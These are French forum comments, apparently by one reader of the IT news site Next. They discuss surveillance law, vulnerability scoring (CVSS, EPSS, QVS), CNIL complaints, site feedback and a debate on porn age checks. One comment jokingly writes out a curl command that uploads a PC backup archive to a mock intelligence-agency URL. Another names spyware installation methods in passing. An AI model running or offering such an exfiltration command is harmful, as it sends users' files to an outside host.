Je voulais dire le 2, mais tu as peut-être raison. En creusant, je vois que la notion de dispositif technique est introduite dans l'article Article 226-3 du code pénal est est apparue la première fois en 2011 par la loi d'orientation et de programmation pour la performance de la sécurité intérieure du 14 mars 2011. Avant, l'article de loi ne parlait que "d'appareils".
Néanmoins, la CNCTR (organisme chargé de surveiller les actions des services de renseignement) parle de dispositif technique pour des "balises" permettant la localisation dune personne, d'un objet ou d'un véhicule. On n'est pas ici dans la lutte contre le crime et la délinquance organisée, mais le vocabulaire est le même.
En plus, en relisant les articles de loi que tu as mis en lien, le dernier article dispose que :
En vue de mettre en place le dispositif technique mentionné à l'article 706-102-1, le juge des libertés et de la détention, à la requête du procureur de la République, ou le juge d'instruction peut également autoriser la transmission par un réseau de communications électroniques de ce dispositif.
Cela confirme donc bien qu'un dispositif technique peut être un logiciel puisque transmis par un réseau télécom. Par contre, ce même article limite cette possibilité de transmission sur un réseau au premier article de la page, c'est-à-dire permettant de récupérer des données stockées sur un système informatique ou affichées sur un écran, saisies sous forme de caractères ou encore "telles qu'elles sont reçues et émises par des périphériques."
Est-ce que ce dernier point concernant les périphériques peut concerner les micros ou caméras ? C'est bien possible. Là aussi, ça dépend de si un smartphone est considéré comme un système informatique ou pas, mais la réponse est probablement oui.
Bref, je n'ai aucune idée de qui a raison entre nous deux !
En continuant à chercher, je suis tombé sur cet article qui allie droit et technique qui apporte des réponses.
L'activation à distance de micro ou caméra a été censurée par le Conseil Constitutionnel. Remarque : il reste possible de le faire en se déplaçant dans le lieu où l'on veut écouter ou voir. C'est en particulier ce point que veulent réintroduire uniquement pour la lutte contre le narcotrafic. Il est possible que dans ce cas limité, le Conseil Constitutionnel l'accepte. Il l'avait refusé avec la justification suivante :
Dès lors, en permettant de recourir à cette activation à distance non seulement pour les infractions les plus graves mais pour l’ensemble des infractions relevant de la délinquance ou de la criminalité organisées, le législateur a permis qu’il soit porté au droit au respect de la vie privée une atteinte qui ne peut être regardée comme proportionnée au but poursuivi.
Donc, pour lutter contre la drogue, il est possible qu'il considère que c'est proportionné.
Très intéressant ces précisions :) Je vais m'empresser de lire tout ça, merci !
Le
01/03/2025 à
12h
57
Ce que je serai curieux de savoir, c'est comment techniquement ils arrivent à faire ça...
Ohhh, je pense qu'on peut imaginer plein de choses : - installation de mouchards physiques sur le PC/smartphone de la cible lorsqu'elle lâche son équipement - installation d'application sur le PC/smartphone via un accès physique au téléphone (la mallette Celebrite, c'est magique) - utilisation de vulnérabilités connues (ou non) de type 0 click RCE - social engineering - infiltration dans la chaine de transport afin d'accéder aux équipements avec leur mise en vente (ça c'est déjà vu avec la NSA
Le "comment" est à vue de nez laissé à la discrétion des personnes autorisées (la DGSI en somme). Maintenant, c'est certain que mes solutions ne permettent pas une écoute à grande échelle.... Pour l'instant . Sans tomber dans la paranoïa, si demain google/apple/MS permet à un gouvernement de déposer une petite backdoor des familles*, le gouvernement aura déjà préparé le terrein depuis des années et la DGSI pourra sortir cet article et dire "Bah quoi ? On a le droit, c'est tout bon"
*Je ne dis pas que c'est fait, pas fait, que ça se fera, que ça ne se fera pas hein. Je pars juste sur une hypothèse.
Le
01/03/2025 à
12h
45
Je n'ai pas l'impression que ça soit la même chose. Dans la loi que tu as mise en lien, il s'agit de dispositifs de la police mis chez les gens, ici, c'est le micro ou la caméra de leur smartphone.
Pour être sur de comprendre : "dispositifs de la police mis chez les gens", tu parles de mouchards physiques sur l'ordi/smartphone, ou d'un micro/caméra pour écouter directement les personnes ? Je n'ai pas l'impression que l'article de loi parle du 2eme cas.
Pour moi*, la loi que j'ai linkée définit : - la mise en place d'un dispositif technique : c'est suffisamment large pour qu'on puisse parler d'un mouchard physique sur l'ordi, de l'installation d'un software, voire de l'utilisation d'une vulnérabilité permettant l'exécution de code - sur un système informatique : comprendre ordinateur, smartphone, box FAI, ou tout autre équipement avec un processeur - permettant de sauvegarder et transférer les données : curl http://dgsi.gouv.fr/onsefaitponcer -XPOST --data-binary "@backup_de_ton_pc.gz" - données affichées, écrites au clavier, reçues ou émises par des périphériques : grosso modo tout ce qui transite sur un canal d'entrée/sortie. Du coup, caméra et micro, ça rentre dans la définition
*Attention, je suis expert en droit uniquement le soir en rentrant du bar ! Autrement dit : je fais une analyse qui me semble juste mais à tout moment je me gaufre, et je suis évidemment ouvert à la critique et à la discussion bienveillante :)
Le
28/02/2025 à
20h
09
Sont quand même vachement cons sur la partie qui parle d'activer les micros et caméras... C'est déjà autorisé depuis LOPSSI 2 de faire ça ! ( wikipedia et l'article de loi )
Est ce que c'était déjà honteux à l'époque ? Oui. Est ce que ça l'est toujours autant ? Oui.
Est ce que 99.99% de la population s'en tartine la babouche ? Oui (malheureusement)
quand Microsoft jugera qu’un nombre assez important d’ordinateurs auront été mis à jour.
Mouais, j'attends de voir ^^' A la limite ils vont juste dire à crowdstrike "ok les gars vous pouvez publier votre write UP"
Le
11/12/2024 à
09h
20
On ne sait pas en revanche comment fonctionne la méthode
C'est une spécialité ça chez MS, de rester cryptique sur les vulnérabilités. Entre les phrases ultra génériques, les vulns tagguées RCE "parc que c'est local mais si l'utilisateur exécute le payload bah ça devient remote", l'absence totale des prérequis nécessaires, etc, c'est une tannée de comprendre leurs bulletins
"Bref : indigne d'un logiciel majeur pour un tel éditeur."
On peut parler de Teams si tu veux.
Ah mais les cavaliers de l'apocalypse ils sont plusieurs hein ! On n'est pas obligé d'avoir qu'un seul soft pourri pour un éditeur donné ^^'
Le
09/12/2024 à
09h
34
Il y a encore peu (moins de 2 ans), le nouvel outlook en mode appli ne savait pas ouvrir des .eml Je répète : un client email qui ne sait pas ouvrir des emails.
Après, on s'étonne que les end users ne comprennent rien à rien
Saxx a pas la meilleure réputation du monde dans la commu sécu (et pas que pour ses communications récentes, cf https://blog.cryptohack.org/twitter-secrets par exemple) ^^' Je comprends la facilité pour Next de le prendre comme source, mais c'est à mon sens un raccourci qui peut être contre productif, et qui pour moi décrédibilise le site
Whoaaaaah, je suis cité sur Next ! Je crois avoir vu la petite fenêtre "Achievement unlocked" en haut à gauche ! Merci d'avoir mis mon humble contribution dans les LIDD :)
Seb, si un jour tu veux d'autres liens/infos/échanges/whatever sur tout ce qui est game hacking, il ne faut pas hésiter une seconde, c'est un sujet qui m'intéresse fortement et pour lequel je peux à peu près passer 10 ans à en discuter ^^ De là à dire que ça pourrait être bien d'en faire une série d'articles...
On a du croiser les flux commentaires. Tu trouveras mes bugs/opti/remarques un peu plus bas :)
Le
18/09/2024 à
19h
36
Alors alors :)
Déjà, petit problème (sur brave au moins) avec le player : - lancement du webplayer - ctrl click sur un lien vers une autre page de next - ouverture du nouvel onglet
Résultat, ça lit le podcast 2x, avec un léger décalage. J'ai tendance à ouvrir à peu près 15 000 onglets (oui, je fais partie de ce genre de personnes), donc là je suis en PLS
Ensuite, le player est blanc, même avec le dark theme, pas que ça me change grand chose personnellement, mais si je me retourne, je crois voir à peu près tout Next qui est en train de sortir les armes là
Ensuite encore ensuite, qu'on aime ou pas les podcast, l'initiative est plus que louable Etant donné que c'est une nouvelle "aventure" pour Next (et peut être pour toi Mathilde, je ne sais pas), ça pourrait être intéressant de faire un édito/série de posts/whatever sur le thème "comment on créé un podcast", non ? eg. choix du micro, isolation, comment gérer sa voix, etc ? Ou alors, ça a juste été le micro du laptop sur le bureau et il n'y a rien à dire de plus ?
Sur le podcast en tant que tel : - Entre 00:50 et 01:01, on a juste la musique de fond. Ca fait un peu long je trouve ^^' - Sur le format podcast, dur de se faire un avis complet sur 2mn30 - Si c'est sur les plateformes de streaming, ça signifie que tous les podcasts seront en libre accès ? Ou certains seront uniquement pour les abonnés ? Ce qui induit que ceux ci ne seront pas sur lesdites plateformes ? - ce n'est pas du tout un exercice facile pour m'y être déjà essayé, donc bravo ! Quelques petites remarques cela dit (il faut y voir ici des axes d'amélioration, je veux pas juste basher) --- Je trouve que ça fait un peu trop lu des fois, par exemple :"on va parler biais des algorithmes [...] ca va être passionnant" --- Dans le même ordre d'idée, le ton est un peu trop forcé des fois (eg. "Et depuis, c'est la folie", "un domaine qui qualifie aussi bien [...] applications") --- Quel va être le format d'un épisode complet ? Des échanges avec d'autres personnes, donc quelque chose de dynamique ? (je sais que ce premier épisode dit que Next va interroger des gens, mais est ce que ça sera un résumé de ce qu'ils ont dit, ou alors ces personnes vont être interviewées dans le podcast ?) --- FWIW, on m'a dit une fois qu'il faut faire un podcast comme si on parlait à un pote en face. Fais ce que tu veux de ça --- Encore une fois bravo pour cet épisode d'intro en tout cas, le ton n'est pas monocorde et c'est pas facile ^^
Enfin... c'est l'équipe de Next qu'on entend à la fin ?
Edit : pas fou l'affichage des bullet points sur next en fait ^^'
Les vidéos du MVG sont bien aussi, il me semble qu'il en a une qui décrit les modes de fonctionnement du PPU et tout ce que le gameboy original avait déjà de plus puissant que la NES.
Je connaissais pas, je vais aller jeter un oeil à cette chaine, thx :)
Le
18/09/2024 à
09h
29
La ressource peut être étendue à de nombreuses consoles : https://www.copetti.org/writings/consoles/. Ce site est une vraie mine d'or pour faire une intro au HW de consoles.
Il y a également ici https://lsdsecdaemon.com/game-hacking-links-repo/ une liste de plusieurs liens vers des ressources similaires, qui pourraient vous aider à faire pas mal de LIDD du coup, à coup de un LIDD par lien
Très intéressant (et étoffé) commentaire. Sur le QVS, je n'ai pas creusé car je ne vais pas "faire le produit" pour Qualys, mais c'est aussi un peu normal qu'ils défendent leur score. J'en comprends cependant qu'il s'agit d'un "mix" entre dangerosité (tel qu'on peut le voir dans CVSS) et probabilité d'exploitation (EPSS), et donc forcément c'est meilleur (selon eux). Ce qui est intéressant (plus que leur QVS) est que Qualys reste une société de premier plan en sécurité informatique, et que leurs observations sont toujours utiles. Je crois que tu as fait une remarque sur le titre du §, ça aurait en effet pu être "CVSS vs QVS vs EPSS", mais je voulais surtout insister sur le fait que le CVSS (beaucoup plus connu) manque de la dimension "probabilité" (qu'on retrouve dans QVS et EPSS, mais le matériau de base de l'article était l'étude de Qualys)...
Ouais la notion de synthèse est pour moi un vague concept dont j'ai entendu parler une fois ou deux, mais flemme de m'y mettre ^^'
Merci pour ton retour, toujours agréable de se dire que le lien journaliste/lecteur est fort sur Next !
Là où on diffère sur l'analyse, c'est que je vois le QVS comme un "remplaçant" (selon Qualys en tout cas) à EPSS, plus qu'un mix entre CVSS et EPSS, puisque le QVS semble prendre le même type de metrics Btw, en soi, je n'ai rien contre QVS, il est déjà arrivé que des initiatives privées soient meilleures que des efforts communs, et in fine c'est le meilleur système qui prendra le lead que ça soit EPSS ou QVS. J'ai par contre quelque chose contre le "on est mieux" sans analyse complète, sans explication du fonctionnement et sans statistiques. Ca fait un peu vendeur de tapis pour moi Ce qu'il faut c'est soit un beau paper, soit du temps pour que la commu se rende compte du meilleur système.
Je te rejoins par contre sur le fait que Qualys est une société effectivement de premier plan, aucun débat là dessus. D'ailleurs on le voit très bien au niveau technique, ils nous sortent des vulns bien vénères assez souvent (coucou regresshion),
Je te rejoins aussi sur le fait qu'EPSS est pour l'instant moins connu que CVSS. (un peu) plus compliqué à appréhender, beaucoup plus récent, les 2 premières versions étaient pas folles, c'est closed source, et c'est aussi moins vendeur de dire "Ya une nouvelle vuln critique mais l'EPSS est de 0.001" dans les sites putaklic ^^ Néanmoins, il commence à se démocratiser de plus en plus dans la commu.
(et oui c'est moi qui ai fait la remarque via le signalement )
PS : et voilà, encore un message étoffé alors que je voulais juste te répondre rapidement PS2 : Au passage, pour tous ceux que ça intéresse, le paper arxiv de l'EPSS : https://arxiv.org/pdf/2302.14172. Même si on n'a pas tout le détail, on apprend quand même une partie des metrics utilisées. Contrairement au QVS
Le
16/08/2024 à
18h
17
https://github.com/CVEProject/cvelistV5/ et https://www.cve.org/Downloads
De là, tu devrais pouvoir récupérer la liste des CVEs avec kernel.org comme CNA et faire tes petites stats kivonbien :)
Sur les failles publiquement exposées, il est possible de jeter un coup d'oeil via shodan/zoomeye/censys, mais tu n'auras par définition que des informations partielles et qui ne représentent pas la totalité des machines vulns mais que celles sur internet. De plus, cette solution, c'est à vérifier vuln par vuln, vu qu'elles ont potentiellement des spécificités différentes (versions spécifique, composant activé ou non, etc).
Tu peux aussi le faire proactivement et faire un gros nessus samer sur 0.0.0.0/0, mais je pense que tu vas avoir quelques soucis (autant légaux que techniques, et non pas lego technics)
Le
16/08/2024 à
13h
33
C'est totalement vrai. L'humain (COUCOU LE PHISHING ! COUCOU L'INSTALL DE SOFTS VEROLES SANS REFLECHIR) est un facteur important et doit être pris en compte. Il y a d'autres "types" de vulnérabilités (shadow IT, non conformités liées à de l'AD (mais pas que), sites customs mis sur internet avec des flaws, etc)
Cela dit, l'article se focus sur les CVE ^^
Le
16/08/2024 à
13h
26
J'avais promis à Ferd que je me réabonnerai un jour. C'est maintenant fait, grâce à cet article, donc bien joué Jean !
Pour en revenir à l'article : j'ai l'impression que le QVS est un indicateur de risque (donc plus proche de l'EPSS), plus qu'un indicateur de criticité (= CVSS).
Il est dommage que le QVS soit autant cryptique. Qualys ne semble pas donner beaucoup de détail sur ce scoring, à peine un "active exploitation, exploit maturity, and visibility on both the dark web and social media". En googlant un peu, on voit aussi d'autres params comme le CVSS ou le CISA KEV, mais ca va pas beaucoup plus loin malheureusement.
Ceux qui bossent dans la sécu vont me répondre "t'es bien gentil ElCroco, mais l'EPSS c'est pareil". Oui et c'est d'ailleurs un reproche que je fais à EPSS et c'est très chiant car on doit croire l'EPSS les yeux fermés. Cependant : - il est beaucoup plus large car non limité à Qualys : tout le monde peut l'utiliser - le FIRST (à l'origine de l'EPSS) n'est pas une entreprise et n'a pas d'intérêt à gagner de la grosse thunasse. Donc j'y vois moins d'arguments commerciaux, - l'EPSS prend en compte des métriques de nombreux acteurs de la sécu qui voient la réalité du terrain (eg. éditeurs EDR, MS, etc qui peuvent donner de manière précise le nombre de vulns réellement exploitées, alors que Qualys peut être pas...
De plus, le gars de chez Qualys est bien mignon, sauf qu'un EPSS de 0.9, c'est ENORME ! On sait que l'EPSS a une courbe plutôt logarithmique ( https://www.first.org/epss/articles/epss_percentiles.png ) donc il est normal qu'avec un EPSS en 0.9 il n'y ait que très peu de vuln. Par contre, vu qu'on n'a aucune idée de comment fonctionne QVS, il est compliqué de faire une comparaison (95/100 vs 0.9) vu de l'extérieur. Du coup, il peut bien sortir les chiffres qu'il veut, ça nous avance en rien x)
Le problème d'ailleurs, avec son analyse de 63% de vulns critiques par le QVS vs ~19% via EPSS, c'est qu'on ne sait pas où est la réalité ^^' Est ce que ces 63% sont vraiment dangereuses et on va se faire péter soon, ou alors, est ce que seules celles de l'EPSS sont réellement dangereuses ? Je peux très bien pondre un indicateur custom qui dit que "moi j'ai raison, et pas l'EPSS".
Concernant les chiffres et leur évolution : il est impossible de revenir en arrière, on ne pourra pas avoir de baisse du nombre de CVE par an (en tout cas pas tant qu'on ne modifiera pas le système dans sa globalité), ou alors de manière conjoncturelle : - il y a toujours plus de softwares - la sécurité est toujours plus à la mode - la FAME. Les "chercheurs en sécurité", faut pas oublier qu'une partie d'entre eux ils veulent juste être en mode kikitoodur à pouvoir dire "Regardez, j'ai trouvé plein de vulns, je suis donc forcément quelqu'un d'important"
Par contre, l'EPSS (ou même le QVS hein) est un outil intéressant car il permet de mettre en lumière la priorisation. "OK il y a 22k vulns, mais j'ai pas le temps de toutes les traiter, donc quelles sont celles que je dois faire en prio ?" Ca se résume à "Si j'ai une fuite d'eau et un clou à planter chez moi, lequel je vais choisir en premier ?"
Déjà, il faut clairment faire attention avec ce que disent les utilisateurs (cf le problème de 2012, ça me paraitrait tout de même étonnant que la cause soit identique)
Et puis Google n'a pas forcément menti. La vulnérabilité peut avoir été effectivement utilisée dès début juin. Peut être même avant. Peut être même en 2012 d'ailleurs. Mais ce n'est pas un mensonge de dire qu'elle a été identifiée par Google fin juin. C'est juste qu'avant, Google ne l'avait juste pas... bah identifiée quoi ^^'
Le ticket créé par l'utilisateur début juin a peut être aidé à l'identification, mais la date de création du ticket ne correspond pas forcément à la date d'identification de la vulnérabilité.
0/ Je fais partie des radins ! (promis, un jour je reprendrai un abo, c'est relou de n'avoir que les débuts d'articles ^^). Je me permets ici un petit message concernant la nouvelle UI, histoire de donner des retours à un site que j'apprécie.
Alors, oui je sais, résistance au changement, tout ça, mais, je trouve que la version mobile -celle que j'utilise principalement- a perdu en "âme". Je trouve pas réellement d'autre mot, mais globalement quand je me connecte sur le site, hormis le petit logo next, je n'ai plus l'impression d'être sur next, mais sur un bête site de news random : un fond blanc, une suite de titres parfois sans image (les briefs, j'ai bien compris que c'est la raison de l'absence d'image) et... et bah c'est tout en fait. Rien qui me fasse dire "ouais, là je suis sur next, il fait chaud et beau, je me sens bien". Je trouve dommage d'avoir résumé la homepage au strict minimum.
Evidemment, ça n'enlève pas la qualité des articles (enfin, ceux que je peux lire x) ), mais juste, j'ai plus l'impression d'être à la maison quoi.
Enfin, je vais faire comme tout le monde : merci à toi ferd d'avoir repris le site ET de donner des news de manière transparente, merci à tous les journalistes de faire un travail de qualité depuis toujours, merci d'être aussi proche des lecteurs, et merci d'être un OVNI incroyable dans cette myriade de sites de news IT froids et sans âme (oui, j'y reviens )
Tchoubz
Edit : homepage ou pas homepage, ça m'empêchera pas venir daily
Je prie tous les jours pour qu'il y ait toujours des bugs sur next, afin de pouvoir toujours avoir des poings dev hebdomadaires. Ils sont hilarants
Mention spéciale au "Franchement, à me relire là, je me demande bien comment on a pu livrer un site aussi pété, mais faut dire qu’on avait pris du citron aussi." ^^
Ah oui ça fonctionne ! Après, il manque les notifications après réponse à un commentaire. 😥
Ah bah ça a plus l'air de marcher chez moi ^^' Même avec des articles à 0 ou 1 commentaire, ça recharge la page. Peut être que l'équipe de dev a vu ça et c'est dit que ça ne servait pas réellement
Je te rejoins sur les notifs, ça me semble pas déconnant. Je sais qu'il y a le GH pour les issues, mais ça serait top d'avoir la liste des features validées et mises dans le pipe par l'équipe de dev
Edit : pouvoir discuter facilement (via les comments ou les issues GH) est un vrai plus pour la communauté, c'est top :)
Le
23/11/2023 à
08h
51
Oh. Ctrl Maj R est un raccourci pour répondre à un commentaire tiens. Comme c'est la mode des tests suite à la MeP, j'en profite
Je ne voulais pas te répondre spécialement cela dit, juste recharger ma page sans cache ^^'
Edit : Ctrl Entrée pour valider le commentaire ne semble pas fonctionner cela dit
Plainte CNIL je dirais. Cette dernière usant de dark patterns pour planquer ses formulaires histoire de dissuader les gens sans doute pour être moins débordée, plusieurs personnes ont créé des proxies (oui on en est là…). Ils finissent par mener ici : https://services.cnil.fr/ (il faut s’inscrire, pas cliquer sur “saisir la CNIL” sinon tu vas te faire balader)
A noter deux choses :
la CNIL a l’air de ne pas bouger contre une entreprise tant qu’il n’y a pas de nombreuses plaintes à son encontre
la CNIL a, des témoignages que j’ai vus, tendance à considérer “insuffisantes” les plaintes où tu n’as pas toi-même commencé le boulot, ce qui est honteux, l’individu moyen n’étant pas juriste ni enquêteur… Pour “commencer le boulot” un classique peut être de faire une demande d’accès à l’entreprise (cf par ex ce modèle) puis une plainte quand l’entreprise n’aura pas manqué de ne pas répondre dans les délais ou de répondre à côté de la plaque/en niant les violations que tu lui reproches.
J’ai souvenir d’un formulaire de contact plus général si tu ne veux pas déposer de plainte mais seulement leur signaler une violation qui ne te concerne pas personnellement (me semble que la plainte c’est seulement si ça te touche), mais impossible de le retrouver, évidemment… J’ai eu l’occasion de l’utiliser une fois il y a plusieurs années pour signaler un service qui laissait en libre accès les données de plein de gens et ils m’ont même répondu et dit faire le nécessaire !
Merci pour ta réponse :) Je suis déjà tombé sur services.cnil.fr, mais ça reste toujours un peu cryptique, ça semble souvent renvoyer vers des sites externes mais je trouve ça dommage. Par exemple, pour mon histoire de newsletters que je reçois après avoir reçu validation par le DPO que mes données étaient supprimées ( https://www.lacitedesnuages.be/ pour ne pas les citer), je ne sais pas où aller. Depuis https://services.cnil.fr
je peux ensuite me faire rediriger vers signal-spam.fr sauf que c’est un manquement RGPD et pas un spam pour moi
ou alors signaler les pratiques frauduleuses d’un site, dans ce cas, c’est redirection vers la DGCCRF (qui ne semble pas être l’organisme le plus logique) ou pharos (pareil, c’est pas le même endroit)
Donc au final, pas de signalement à la CNIL, je trouve ça dommage pour un service qui doit être là pour nous.
Pour tes autres points, je suis partiellement d’accord avec toi : dans la théorie, un signalement devrait suffire. Dans la pratique, imagine un peu la quantité faramineuse de boulot que cela engendrerait : il me semble, sur le coté pragmatique, que ça soit plus simple de viser une entreprise pour laquelle de nombreuses plaintes sont remontées. Dans la même veine, si la CNIL recoit juste des plaintes “XXX ils sont méchants avec moi” sans réelle preuve à l’appui, pareil niveau taf, ca doit représenter des montagnes de boulot. Sans compter les plaintes sur laquelle qu’on doit leur remonter et sur laquelle elle n’est aucunement compétente.
Même réponse qu’au dessus pour services.cnil.fr Pour le point DPO, j’ai déjà fait de multiples demandes à des DPO, j’ai un peu tout et rien : des absences de réponses, des fois ça se passe très bien, des demandes (à mon avis déraisonnées) de vérification d’identité *
Je n’étais jamais tombé sur le formulaire de contact, je pense que je vais m’en service un peu plus souvent :)
* Demandes de CNI principalement, ce qui ne leur apporterait rien parce que je peux très bien falsifier n’importe quel scan de CNI d’une part, et ils n’ont jamais eu ma CNI à l’inscription d’autre part (coucou la fnac)
Le
21/01/2023 à
11h
14
9 pages de commentaires passionnés et passionnants, je n’ai malheureusement pas pris le temps de tout lire pour trouver la réponse à ma question
Je vais déborder un peu sur un sujet same same but different, il m’arrive, comme tout le monde, de recevoir des newsletters que je n’ai pas autorisé*, des mails alors que j’ai expressément demandé à être supprimé de la DB via une demande DPO, ou carrément des DPO injoignables ,etc. etc., qui sont des joyeusetés pas trop conforme RGPD.
Dans le même ordre d’idée que cet article (et celui de wekiwi), serait il possible d’envisager une série de posts sur les autres non conformité RGPD (comme celle que je viens de citer plus haut) ? Pas juste “regardez, c’est pas bien ce qu’ils font”, mais d’aller plus loin en donnant les clés pour remonter ces infos à la CNIL par l’intermédiaire de NXI (ou pas forcément d’ailleurs, en passant en direct, mais ça donnerait peut être moins de poids en direct).
Au passage, sans même attendre cette série d’articles (qui ne sera peut être jamais faite, je ne sais pas si l’équipe NXI lira mon message et se dira “OMG, mais ce ElCroco, c’est un génie, faisons ce qu’il dit et embauchons le par la même occasion”), pour les problématiques que j’ai cité plus haut, quelqu’un sait comment remonter ces infos à la CNIL ? Des fois on me dit “faut passer par signal-spam.fr”, des fois pas, des fois c’est par un form sur le site de la CNIL mais qui n’est pas totalement pour ma demande, etc. Je ne m’y retrouve jamais totalement, donc si quelqu’un sait comment signaler plus précisément, je suis preneur
* assez classiquement quand on me demande mon mail à un guichet pour recevoir les factures, alors que “promis, on ne vous enverra aucun mail”
My bad, j’ai pas été assez clair, c’est moi qui étais hors sujet à répondre uniquement pour tiddlywiki et pas pour la news sur manifestV3 ^^ Effectivement, c’est pour TW5 donc pas possible pour toi, dommage :/
J’adore les pseudos raisonnements de geeks sans enfant pour qui la dose quotidienne de porno gratuite est un droit.
L’asso en question est intégriste soit. Mais elle est loin d’être la seule à demander cela. Donc un avis sur la protection des enfants contre le porno ? ou alors tu considères que c’est normal ?
Dernière question: est eu un homme ou une femme ? Car bizarrement le rapport au porno diffère suivant son genre.
Et bien ma foi, je pense que nombre d’autres personnes ont déjà répondu à ma place, mais étant donné que tu t’es adressé à moi, je vais te répondre :)
carbier a dit:
J’adore les pseudos raisonnements de geeks sans enfant pour qui la dose quotidienne de porno gratuite est un droit.
Moi, on commence par une attaque ad hominem, ça commence fortement, tout en présupposant 3 choses : je suis un geek, je n’ai pas de gamin, et je me paluche tous les jours sur du porno
Oui, je suis un geek. Ma foi, pas trop compliqué de le deviner, tant NXI est un nid à geeks. Mais en quoi être un geek est il une tare ? Il me semble que c’est le sens implicite de ta phrase (sauf si je me trompe, auquel cas, je souhaiterais plus d’éclaircicement)
Non, je n’ai pas d’enfant. Et ? Je n’ai absolument pas jugé une éducation parentale dans mes propos. Pas une seule fois j’ai dit qu’il fallait éduquer son enfant de telle ou telle manière. Mon propos est (en substance) : les personnes de ce genre d’asso sont tellement horripilées par le porno qu’elles ont font un cheval de bataille jusqu’à l’absurde
Non, je ne matte pas du porno tous les jours : ça m’arrive, comme tout le monde. And so what?
carbier a dit:
J’adore les pseudos raisonnements de geeks sans enfant pour qui la dose quotidienne de porno gratuite est un droit.
Revenons sur la dernière partie : en quoi regarder du porno gratuit ne serait pas un droit ? Regarder du porno, qu’il soit payant ou gratuit, n’est pas interdit à ce que je sache. Je suis majeur et vacciné, j’ai absolument le droit d’en regarder. L’article parle du fait d’interdire son accès aux mineurs, aucunement que celui ci doit être payant.
carbier a dit:
L’asso en question est intégriste soit. Mais elle est loin d’être la seule à demander cela.
Et alors ? Quand bien même il y aurait des centaines d’associations de ce type, quel est le rapport avec mon propos ? Je ne comprend pas le lien entre ce que j’ai dit (les personnes de cette asso -et probablement d’autres- en font un combat limite absurde) et le fait qu’il y ait plusieurs associations qui demandent l’interdiction au porno. Le lien le plus simple que je vois -et excuse moi si j’ai mal compris, je te propose dans ce cas de définir plus amplement ton propos- c’est que “comme elles sont plein, c’est que cette demande est légitime”. Si c’est cela, et bien ma foi non, ce n’est pas forcément légitime et au besoin je pourrais te donner des exemples.
carbier a dit:
Donc un avis sur la protection des enfants contre le porno ? ou alors tu considères que c’est normal ?
Ma foi, je n’ai pas de gamin, donc je ne suis, comme tu le laisses penser, pas le plus légitime pour en parler, et clairement à juste titre. Je n’ai d’ailleurs jamais dit qu’il ne fallait pas protéger les enfants du porno. Bien évidemment que voir un boulard à 10 ans c’est pas fou, on est tous d’accord là dessus. Par contre, à 15⁄16 ans, ça me choque moins. Est ce qu’à cet âge c’est grave ? Probablement pas tant que ça selon moi. On est au lycée à 15 ans, et les hormones ca tire dans tous les sens à cet âge. Le porno était moins accessible que maintenant à l’époque, et pourtant ça parlait de cul (et ça ne faisait pas qu’en parler ^^‘)
D’une manière générale, J’ai envie de dire que c’est une situation plus compliquée que juste “c’est la faute des parents”, “c’est la faute des sites X”, “c’est la faute du gouvernement”, etc etc. Dire que c’est un manque d’éducation est peut être une partie du problème, dire que les sites pornos ne vérifient pas suffisamment est peut être une autre partie du problème, etc etc.
Maintenant, comment résoudre cette situation ? Je ne veux pas rentrer dans ce débat. Car je ne suis pas parent et que ce n’est donc pas mon job que d’y réfléchir.
carbier a dit:
Dernière question: est eu un homme ou une femme ? Car bizarrement le rapport au porno diffère suivant son genre.
Ecoute, pour peu que ça vaille comme question, je suis un homme, j’espère juste ne pas avoir d’attaque ad hominem sur ce point. En tout cas, les nanas mattent du porno aussi, promis. Quel est pour toi la différence suivant le genre pour toi. J’aimerais avoir une réponse si possible objective, pour comprendre ton point de vue là dessus.
Edit 28/05/2022, 01:02 : fix typo
Le
24/05/2022 à
19h
13
(quote:2074254:skankhunt42 ) Tout ça parce que les parents sont trop con pour les éduquer correctement et ne savent pas s’adapter au nouvelle technologies ?
Je suis persuadé (pas de chiffre, pas de source, juste mon ressenti) que ce n’est pas que le fait de protéger les enfants. Pour moi, les personnes qui sont dans ce genre d’asso sont tout simplement répugnées par le porno. Tellement répugnées qu’elles en font un combat pieux (ha ha ha, pieux, asso chrétienne, tu l’as ? 😀). Une chasse aux sorcières (ha ha ha, chasse aux sorcières, référence à la chrétienté de l’époque, tu l’as ? 😀) avec pour tache divine de purger le bas monde des ignominies de la chair et qui prend “presque” comme excuse les enfants
En somme, le cliché classique de la mère de famille de 60 ans tirée à 4 épingles, qui a eu une éducation religieuse forte, qui a fait 4 enfants à son mari parce que et qui voit le sexe comme le diable personnifié parce qu’on lui a dit qu’un clito c’était tabou et qu’un pénis c’était obscène.
Je ne veux pas rentrer dans le débat de “est ce que ce filtre anti arnaque est bien ou pas ?”, “est ce que le gouv veut censurer ou pas ?” ni rien.
J’aimerais simplement émettre une remarque d’ordre général (pas spécifiquement lié au DNS de cet article donc). Bon nombre de personnes ici ont connaissance de solutions techniques, ce qui n’est pas le cas de la majorité.
Globalement, si une solution permet avec 20% d’effort d’effectuer 80% du boulot, ça “suffit” (loi de pareto, tout ça). Il y aura toujours des gens qui seront aptes à bypasser telle ou telle solution, mais ces personnes ne sont pas la cible du sujet (encore une fois peu importe le sujet), l’idée étant de faire passer la solution pour 80% des utilisateurs avec 20% d’énergie.
Si je prend un autre exemple avec le téléchargement illégal : bloquer les sites miroirs permet avec une action rapide (20% d’énergie) de rendre les sites miroirs indisponibles pour la majorité (80% de “bénéfice”) des utilisateurs.
/!\ Je me répète, je ne dis pas que c’est bien ou pas (autant pour ce filtre que pour les sites miroirs). Je dis juste que pour moi, l’idée n’est pas de cibler toute la population car c’est impossible, mais la majorité avec un moyen “simple”.
Rien de mieux qu’un article comme ça pour commencer la journée x) Darmanin a quand même cet incroyable pouvoir de me faire bouillir le sang en moins de 30 secondes, chaque décision de sa part menant un peu plus vers son sacro-saint 1984.
Mais trêves de plaisanteries, j’ai quand même une paire de questions.
est ce qu’on a une idée de comment il veut les récupérer, ces urls ? parce que les 3 derniers sites au monde qui restent en HTTP plain text, on s’en fout un peu. Du coup, hormis demander les logs aux sites (lol), je ne vois pas grand chose d’autre à part casser le SSL. Et ça, il en serait possible, le bougre…
cette rustine, il arrive en mode “hey mes petits potes à la compote, je vous ai pondu ça hier devant ‘Plus belle la vie sécuritaire’, donc vous me ferez le plaisir de le rajouter dans votre bouquin rouge là, le dalloz-j’sais-pas-quoi”, ou alors ça suit un circuit classique de validation ?*
il existe quelque part des stats/données/résultats de ce qui est collecté ? Et de l’utilité réelle que ça apporte ?
quelqu’un pourrait refaire du café svp ?
Have fun ElCroco
* Le lecteur avisé se rendra compte que je n’y connais rien dans ce domaine ^^’
